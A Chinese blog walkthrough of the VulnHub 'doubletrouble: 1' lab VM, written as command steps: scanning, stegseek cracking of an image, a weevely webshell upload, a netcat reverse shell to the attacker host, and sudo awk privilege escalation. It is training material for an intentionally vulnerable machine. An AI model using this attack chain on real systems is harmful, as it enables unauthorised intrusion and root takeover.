vulnhyb:doubletrouble: 1

已于 2024-05-30 09:33:30 修改
阅读量268 收藏 8
点赞数 5
文章标签: 网络
于 2024-05-29 18:18:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_69670995/article/details/139301988
版权

1.环境搭建

靶机下载:doubletrouble: 1 ~ VulnHub

2.渗透过程

将靶机网络改为仅主机模式,和kali虚机使用一个网卡

开启靶机

在kali中使用nmap -sn 扫描开启的虚机

nmap -sn 192.168.56.0/24

发现靶机IP地址,使用nmap -sS 扫描靶机

nmap -sS 192.168.56.107

使用浏览器访问靶机80端口

http://192.168.56.107

发现是qdPM 9.1,先使用dirb扫描web目录

dirb http://192.168.56.107

发现secret,uploads目录,浏览器访问secret

http://192.168.56.107/secret

发现一张图片,使用wget下载图片,这图片中可以有提示

wget http://192.168.56.107/secret/doubletrouble.jpg

这图片是stegtseek加密的图片,使用工具进行爆破

stegseek doubletrouble.jpg /usr/share/wordlists/rockyou.txt -xf output

查看output文件

cat output

得到用户名和密码,在浏览器中登陆

登陆成功,在页面中存在一个文件上传漏洞

使用kali中的weevely工具生成木马文件

weevely generate 666 shell.php

上传文件显示失败

在浏览器中查看一下uplaods目录中的文件

发现出存在刚刚上传的文件,使用weevely工具进行连接

weevely http://192.168.56.107/uploads/users/508828-shell.php

连接成功使用nc工具监听6666端口

nc -lvp 6666

使用nc工具进行反弹shell

nc -e /bin/bash 192.168.56.101 6666

使用python3命令,进行python交互

python3 -c 'import pty;pty.spawn("/bin/bash")'

查看权限

sudo -l

发现使用的是awk(文本分析工具),进行提权

sudo awk 'BEGIN {system("/bin/bash")}'

提权成功

id

GJyt
关注
Vulnhub靶机:doubletrouble
qq_48904485的博客
01-06 1088
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:doubletrouble(10.0.2.7)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/doubletrouble-1,743/
VulnHub:doubletrouble1
Aukum的博客
07-28 1123
Vulnhub——doubletrouble,总共两个靶机,涉及qdpm漏洞利用,sudo提权和内核提权。
vulnhub:doubletrouble1靶机
qq_63283137的博客
10-03 201
根据之前爆破的uploads目录,查看已经上传成功(要多观察下文件到底上传成功没有),爆出两组的账户密码,尝试登录80端口http、22端口ssh。查看当前用户的sudo权限,发现可以sudo执行awk命令。是个管理员登录界面,使用burp弱口令爆破,无用。发现这个主题有个文件上传的命令执行漏洞,先留着。#-xf 将破解出的信息存放到指定的文件里。是个登录界面,随手ssh爆破试试。尝试访问上面的目录,发现有个图片。发现有个ova镜像文件,下载下来。在访问上传的文件之前执行监听。分析漏洞,发现可以上传文件。
Vulnhub项目:doubletrouble
Ays.Ie的博客
05-30 707
Vulnhub项目:doubletrouble
kali-vulnhub:doubletrouble
curme_miller的博客
01-26 4200
1.安装好doubletrouble靶机,界面如下:(kali:192.168.0.104;靶机:192.168.0.110) 为Debian,没有发现较明显的信息 2.开始扫描端口 $ nmap -Pn 192.168.0.110 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org
vulnhub靶机:doubletrouble
waitagirl的博客
03-21 694
vulnhub靶机:doubletrouble
VulnHub日记(九):Doubletrouble
Dawn_Xi的博客
09-17 1478
靶机介绍 虚拟机链接:doubletrouble: 1 ~ VulnHub 参考博客:DoubleTrouble - HackMyVM - Vulnhub - Writeup - Security 开始练习 本机ip:192.168.56.102 目的机ip:192.168.56.122 netdiscover -r 192.168.56.0/24 nmap -A 192.168.56.122 开放80和22端口,访问web页面,同时使用dirsearch枚举目录 # .
vulnhub靶机-doubletrouble: 1
yc11223344的博客
08-25 768
攻击机:192.168.100.128靶机:192.168.100.130。
DOUBLETROUBLE: 1实战演练
龙狼刺的博客
05-24 738
DOUBLETROUBLE 1
doubletrouble:html5 w vim快捷方式中的两人游戏
05-26
双重麻烦 带有html5 w / vim快捷键的... 要开始玩,请抓住一个朋友并前往 如果您有兴趣帮助: git clone https://github.com/jonathanballs/doubletrouble.git cd doubletrouble npm install . 启动服务器 node .
【Vulnhub靶场】DOUBLETROUBLE: 1 通关writeup
weixin_44588899的博客
05-20 1052
环境 靶机地址:https://www.vulnhub.com/entry/doubletrouble-1,743/ kali攻击机ip:192.168.220.128 靶机 ip: 靶机地址: 使用命令: arp-scan -l 探测发现是:192.168.220.130 开始探测 nmap -T4 -p- -A 192.168.220.130 发现开放22、80端口, 打开http://192.168.220.130 /,是一个登录框,没什么有价值的东西,直接扫目录吧。 dirb http:
VulnHub doubletrouble
weixin_45682839的博客
10-11 413
涉及知识:端口服务探测、敏感目录收集、WEB信息搜集、框架漏洞利用、利用代码修改、图片隐写破解、linux本地提权、SQL注入等。
doubletrouble靶机
08-29
第二个地址是https://www.vulnhub.com/entry/doubletrouble-1,743/,可以获取更多有关靶机的描述信息。靶机中包含一个名为"doubletrouble"的数据库,其中有一个名为"users"的表。你可以使用sqlmap等工具对该表进行...
Linux 再入门整理:详解 /etc/fstab 文件
一只奋斗的猪
10-01 1167
`/etc/fstab` 文件是 Linux 系统中用于定义和管理文件系统的挂载信息的配置文件。它的作用是告诉系统在启动时,应该如何自动挂载各种文件系统。挂载是 Linux 操作系统中一种将存储设备与目录树关联的操作。通过挂载,存储设备中的文件可以通过目录访问。
项目管理-信息技术发展
最新发布
GAVIN
10-04 244
对称加密:DES 3DES AES RC5 IEDA SM1 SM4。2)分类:PAN LAN MAN WAN 公用网 专用网。4)数据结构模型 层次模型 网状模型 关系模型。1)存储 分类:DAS FAS NAS SAN。物联网(IoT) 感知层 网络层 应用层。8) 5G 高速率 低时延 大连接。设备安全 数据安全 内容安全 行为安全。4.信息安全 保密性 完整性 可用性。3)网络协议 语法 语义 时许。5)IEEE 802 规范。6)TCP/IP 协议。4)网络标准协议 7层。
毕业设计——springboot+netty+websocket实现一个简单的ChatGpt机器人聊天
【CSDN】
09-29 755
WebSocket是html5开始浏览器和服务端进行全双工通信的网络技术。在该协议下,与服务端只需要一次握手,之后建立一条快速通道,开始互相传输数据,实际是基于TCP双向全双工,比http半双工提高了很大的性能,常用于网络在线聊天室等。申请key的教程在项目resources目录readme.md文件中。1、接入了chatGpt接口,只需要替换成自己的key就行。2、实现了与机器人的聊天,可以优化做成智能客服。
组播基础-1
DC_BLOG的博客
09-27 879
信息的发送者为:组播源 接受相同信息的接收者构成一个组播组,并且每个接收者都是组播组成员 提供组播功能的路由器成为:组播组路由器 组播路由器不仅提供组播路由功能,也提供组成员管理功能,也可以是组播组成员
使用socket编程来实现一个简单的C/S模型(TCP协议)
caiji0169的博客
10-02 1681
下图是基于TCP协议的客户端/服务器程序的一般流程:服务器调用socket()、bind()、listen()完成初始化后,调用accept()阻塞等待,处于监听端口的状态,客户端调用socket()初始化后,调用connect()发出SYN段并阻塞等待服务器应答,服务器应答一个SYN-ACK段,客户端收到后从connect()返回,同时应答一个ACK段,服务器收到后从accept()返回。数据传输的过程:建立连接后,TCP协议提供全双工的通信服务,但是一般的客户端/服务器程序的流程是由客户端主动发起请求,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值